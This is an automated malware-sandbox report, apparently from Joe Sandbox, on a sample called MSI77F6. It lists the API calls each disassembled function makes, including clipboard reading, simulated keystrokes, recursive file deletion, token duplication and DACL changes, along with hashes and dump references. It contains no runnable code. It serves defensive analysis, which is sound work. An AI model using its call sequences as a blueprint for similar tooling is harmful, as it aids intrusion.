                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007E43BE
                                        • GetCurrentThreadId.KERNEL32 ref: 007E43C5
                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 007E43D1
                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007E43E2
                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007E43EA
                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 007E43F2
                                        • SetForegroundWindow.USER32(000000FF), ref: 007E43F5
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007E440A
                                        • keybd_event.USER32(00000012,00000000), ref: 007E4415
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007E441F
                                        • keybd_event.USER32(00000012,00000000), ref: 007E4424
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007E442D
                                        • keybd_event.USER32(00000012,00000000), ref: 007E4432
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007E443C
                                        • keybd_event.USER32(00000012,00000000), ref: 007E4441
                                        • SetForegroundWindow.USER32(000000FF), ref: 007E4444
                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 007E446B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: 5af0624c6186da8556df2c87d1301b53da170af25082d7e5a8cd1be748b138f8
                                        • Instruction ID: a7a1a1e3aaafb5fa44ed4b86963e31825d4ae4311bf589fe165d61a95f8d5fe2
                                        • Opcode Fuzzy Hash: 5af0624c6186da8556df2c87d1301b53da170af25082d7e5a8cd1be748b138f8
                                        • Instruction Fuzzy Hash: 443183B1B40258BBEB316B769C49F7F3F6DEB49B50F108015FA04EA1D0C6B85D10EAA4
                                        Function 007B6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007731DA
                                          • Part of subcall function 007B7B9F: __wsplitpath.LIBCMT ref: 007B7BBC
                                          • Part of subcall function 007B7B9F: __wsplitpath.LIBCMT ref: 007B7BCF
                                          • Part of subcall function 007B7C0C: GetFileAttributesW.KERNEL32(?,007B6A7B), ref: 007B7C0D
                                        • _wcscat.LIBCMT ref: 007B6B9D
                                        • _wcscat.LIBCMT ref: 007B6BBB
                                        • __wsplitpath.LIBCMT ref: 007B6BE2
                                        • FindFirstFileW.KERNEL32(?,?), ref: 007B6BF8
                                        • _wcscpy.LIBCMT ref: 007B6C57
                                        • _wcscat.LIBCMT ref: 007B6C6A
                                        • _wcscat.LIBCMT ref: 007B6C7D
                                        • lstrcmpiW.KERNEL32(?,?), ref: 007B6CAB
                                        • DeleteFileW.KERNEL32(?), ref: 007B6CBC
                                        • MoveFileW.KERNEL32(?,?), ref: 007B6CDB
                                        • MoveFileW.KERNEL32(?,?), ref: 007B6CEA
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 007B6CFF
                                        • DeleteFileW.KERNEL32(?), ref: 007B6D10
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B6D37
                                        • FindClose.KERNEL32(00000000), ref: 007B6D53
                                        • FindClose.KERNEL32(00000000), ref: 007B6D61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 1867810238-1173974218
                                        • Opcode ID: 00f391b82017b7eb8223291ad4bc1ed7a1df6b4e0da7ac91827a5b34bfd208a9
                                        • Instruction ID: e6ed193e27710b0efbf0ac9c7ee301abfb9da5b0000c5395d7204b2b139c0d40
                                        • Opcode Fuzzy Hash: 00f391b82017b7eb8223291ad4bc1ed7a1df6b4e0da7ac91827a5b34bfd208a9
                                        • Instruction Fuzzy Hash: DF510D72A0415CAADF21EBA0DC88FEA777DBF05304F4445D6E659A3141DB38AB88CF61
                                        Function 007C7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32(0080DBF0), ref: 007C70C3
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 007C70D1
                                        • GetClipboardData.USER32(0000000D), ref: 007C70D9
                                        • CloseClipboard.USER32 ref: 007C70E5
                                        • GlobalLock.KERNEL32(00000000), ref: 007C7101
                                        • CloseClipboard.USER32 ref: 007C710B
                                        • GlobalUnlock.KERNEL32(00000000), ref: 007C7120
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 007C712D
                                        • GetClipboardData.USER32(00000001), ref: 007C7135
                                        • GlobalLock.KERNEL32(00000000), ref: 007C7142
                                        • GlobalUnlock.KERNEL32(00000000), ref: 007C7176
                                        • CloseClipboard.USER32 ref: 007C7283
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                        • String ID:
                                        • API String ID: 3222323430-0
                                        • Opcode ID: 1c42fc7f394564c5fcc5e166a8e13555fe94b28522f5e59d6782bf06df7b7e7a
                                        • Instruction ID: 4781c1364254537c6b6b45e43ddf67396dcaf3441f7d97b3ef3792109dbc698b
                                        • Opcode Fuzzy Hash: 1c42fc7f394564c5fcc5e166a8e13555fe94b28522f5e59d6782bf06df7b7e7a
                                        • Instruction Fuzzy Hash: FC51DE31208205ABD725EB64CC8AF7E77A9BB88B41F00851DF54AD61E1EF68DD04CB62
                                        Function 007AB9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007ABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007ABF0F
                                          • Part of subcall function 007ABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007ABF3C
                                          • Part of subcall function 007ABEC3: GetLastError.KERNEL32 ref: 007ABF49
                                        • _memset.LIBCMT ref: 007ABA34
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007ABA86
                                        • CloseHandle.KERNEL32(?), ref: 007ABA97
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007ABAAE
                                        • GetProcessWindowStation.USER32 ref: 007ABAC7
                                        • SetProcessWindowStation.USER32(00000000), ref: 007ABAD1
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007ABAEB
                                          • Part of subcall function 007AB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007AB9EC), ref: 007AB8C5
                                          • Part of subcall function 007AB8B0: CloseHandle.KERNEL32(?,?,007AB9EC), ref: 007AB8D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                        • String ID: $default$winsta0
                                        • API String ID: 2063423040-1027155976
                                        • Opcode ID: 83cbc3e7d98704cdce66822780f49b17ea5cabd7fb34295af562b4b584d8eca2
                                        • Instruction ID: 3148aed5bb5a0c7679dd1e4fb33fae40532fbbca0d206843af32ee93ccc4bcb2
                                        • Opcode Fuzzy Hash: 83cbc3e7d98704cdce66822780f49b17ea5cabd7fb34295af562b4b584d8eca2
                                        • Instruction Fuzzy Hash: B4815971800209EFDF119FA4DD49EEEBBB9FF49314F048219F915A6162DB398E14EB60
                                        Function 007C2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 007C2065
                                        • _wcscmp.LIBCMT ref: 007C207A
                                        • _wcscmp.LIBCMT ref: 007C2091
                                        • GetFileAttributesW.KERNEL32(?), ref: 007C20A3
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 007C20BD
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007C20D5
                                        • FindClose.KERNEL32(00000000), ref: 007C20E0
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 007C20FC
                                        • _wcscmp.LIBCMT ref: 007C2123
                                        • _wcscmp.LIBCMT ref: 007C213A
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C214C
                                        • SetCurrentDirectoryW.KERNEL32(00823A68), ref: 007C216A
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007C2174
                                        • FindClose.KERNEL32(00000000), ref: 007C2181
                                        • FindClose.KERNEL32(00000000), ref: 007C2191
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1803514871-438819550
                                        • Opcode ID: c560ae8813ab2c06d9d99bb24382498452a7195bd4c83cdd99f2e3b8edb2c6f1
                                        • Instruction ID: 0ccc7d9947e8f312281e4d7997c7ad77c3096ae94797e66cd4f11538270f1fb9
                                        • Opcode Fuzzy Hash: c560ae8813ab2c06d9d99bb24382498452a7195bd4c83cdd99f2e3b8edb2c6f1
                                        • Instruction Fuzzy Hash: 3E31823150021DBBDF20ABA4EC48FEE77ADAF05360F15406AE911E2191DB7CDE85CA65
                                        Function 007DF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • DragQueryPoint.SHELL32(?,?), ref: 007DF14B
                                          • Part of subcall function 007DD5EE: ClientToScreen.USER32(?,?), ref: 007DD617
                                          • Part of subcall function 007DD5EE: GetWindowRect.USER32(?,?), ref: 007DD68D
                                          • Part of subcall function 007DD5EE: PtInRect.USER32(?,?,007DEB2C), ref: 007DD69D
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007DF1B4
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007DF1BF
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007DF1E2
                                        • _wcscat.LIBCMT ref: 007DF212
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007DF229
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007DF242
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 007DF259
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 007DF27B
                                        • DragFinish.SHELL32(?), ref: 007DF282
                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 007DF36D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 2166380349-3440237614
                                        • Opcode ID: 0670d1ffd7c93557332f028f5f75356d1972c4911efe53fbeca81fed5213e860
                                        • Instruction ID: 2ce3ee4cd9ffa8900508c80e9848b7e830ee4adf721d6af521deb9a40b5907d1
                                        • Opcode Fuzzy Hash: 0670d1ffd7c93557332f028f5f75356d1972c4911efe53fbeca81fed5213e860
                                        • Instruction Fuzzy Hash: 6B615971008300EFC711EF60DC49DAFBBF8BF89750F004A2AF595962A1DB389A05CB62
                                        Function 007C219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 007C21C0
                                        • _wcscmp.LIBCMT ref: 007C21D5
                                        • _wcscmp.LIBCMT ref: 007C21EC
                                          • Part of subcall function 007B7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007B7621
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007C221B
                                        • FindClose.KERNEL32(00000000), ref: 007C2226
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 007C2242
                                        • _wcscmp.LIBCMT ref: 007C2269
                                        • _wcscmp.LIBCMT ref: 007C2280
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C2292
                                        • SetCurrentDirectoryW.KERNEL32(00823A68), ref: 007C22B0
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007C22BA
                                        • FindClose.KERNEL32(00000000), ref: 007C22C7
                                        • FindClose.KERNEL32(00000000), ref: 007C22D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 1824444939-438819550
                                        • Opcode ID: 59a81eccbb671e3b7a3f3772f7e440ca6858e905ddad00631e79081a0a18afd0
                                        • Instruction ID: 7b2a7372d8c2e5f1dd64618b7077011339ac2150f3fe09b6ae1435cbcdaeaa3c
                                        • Opcode Fuzzy Hash: 59a81eccbb671e3b7a3f3772f7e440ca6858e905ddad00631e79081a0a18afd0
                                        • Instruction Fuzzy Hash: 4531D33150022DBADF20EBA4EC48FEE73ADBF05320F114169E911E2192D77C9E86CA64
                                        Function 00776BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove_memset
                                        • String ID: Q\E$[$\$\$\$]$^
                                        • API String ID: 3555123492-286096704
                                        • Opcode ID: 2350d4e4e6c5cb0594dd57c82f824593342de17a6de3f5420fafd2ac12e1c37b
                                        • Instruction ID: 9c9c95198c1eac161a4b7fb838830015c7f74d765a18e716cfafec6afdea1cac
                                        • Opcode Fuzzy Hash: 2350d4e4e6c5cb0594dd57c82f824593342de17a6de3f5420fafd2ac12e1c37b
                                        • Instruction Fuzzy Hash: 83728C71E04219CBDF28CF98C9806BDB7B1FF44354F2481A9D959AB341E778AE81DB90
                                        Function 007DECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007DED0C
                                        • GetFocus.USER32 ref: 007DED1C
                                        • GetDlgCtrlID.USER32(00000000), ref: 007DED27
                                        • _memset.LIBCMT ref: 007DEE52
                                        • GetMenuItemInfoW.USER32 ref: 007DEE7D
                                        • GetMenuItemCount.USER32(00000000), ref: 007DEE9D
                                        • GetMenuItemID.USER32(?,00000000), ref: 007DEEB0
                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 007DEEE4
                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 007DEF2C
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007DEF64
                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 007DEF99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                        • String ID: 0
                                        • API String ID: 3616455698-4108050209
                                        • Opcode ID: b6a9f077a42465b946f37947757633916590916af0d17dadbed8408639c76926
                                        • Instruction ID: 92acc2d1f4b942b72605290d556f0f3aac98c3c1ea33b7f015326c7486761662
                                        • Opcode Fuzzy Hash: b6a9f077a42465b946f37947757633916590916af0d17dadbed8408639c76926
                                        • Instruction Fuzzy Hash: 73817071204301AFDB51EF14D888A6BBBF5FB88754F00492EF9959B391D734D905CB92
                                        Function 007AB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007AB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007AB903
                                          • Part of subcall function 007AB8E7: GetLastError.KERNEL32(?,007AB3CB,?,?,?), ref: 007AB90D
                                          • Part of subcall function 007AB8E7: GetProcessHeap.KERNEL32(00000008,?,?,007AB3CB,?,?,?), ref: 007AB91C
                                          • Part of subcall function 007AB8E7: RtlAllocateHeap.NTDLL(00000000,?,007AB3CB), ref: 007AB923
                                          • Part of subcall function 007AB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007AB93A
                                          • Part of subcall function 007AB982: GetProcessHeap.KERNEL32(00000008,007AB3E1,00000000,00000000,?,007AB3E1,?), ref: 007AB98E
                                          • Part of subcall function 007AB982: RtlAllocateHeap.NTDLL(00000000,?,007AB3E1), ref: 007AB995
                                          • Part of subcall function 007AB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007AB3E1,?), ref: 007AB9A6
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007AB3FC
                                        • _memset.LIBCMT ref: 007AB411
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007AB430
                                        • GetLengthSid.ADVAPI32(?), ref: 007AB441
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 007AB47E
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007AB49A
                                        • GetLengthSid.ADVAPI32(?), ref: 007AB4B7
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007AB4C6
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007AB4CD
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007AB4EE
                                        • CopySid.ADVAPI32(00000000), ref: 007AB4F5
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007AB526
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007AB54C
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007AB560
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        • Opcode ID: d11ad294363d52aee26568bb4d8be22349dad161b3e10a721f72edec1f0824ae
                                        • Instruction ID: 7fd7e0cab349ef9bbe989993e63a5db17a89cbb28c403a3b3f6e7dd6da194954
                                        • Opcode Fuzzy Hash: d11ad294363d52aee26568bb4d8be22349dad161b3e10a721f72edec1f0824ae
                                        • Instruction Fuzzy Hash: B9512B71900209EFDF10DFA4DC55AEEBB79FF4A300F048229E915A7292DB399A15CB64
                                        Function 007B6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007731DA
                                          • Part of subcall function 007B7C0C: GetFileAttributesW.KERNEL32(?,007B6A7B), ref: 007B7C0D
                                        • _wcscat.LIBCMT ref: 007B6E7E
                                        • __wsplitpath.LIBCMT ref: 007B6E99
                                        • FindFirstFileW.KERNEL32(?,?), ref: 007B6EAE
                                        • _wcscpy.LIBCMT ref: 007B6EDD
                                        • _wcscat.LIBCMT ref: 007B6EEF
                                        • _wcscat.LIBCMT ref: 007B6F01
                                        • DeleteFileW.KERNEL32(?), ref: 007B6F0E
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B6F22
                                        • FindClose.KERNEL32(00000000), ref: 007B6F3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
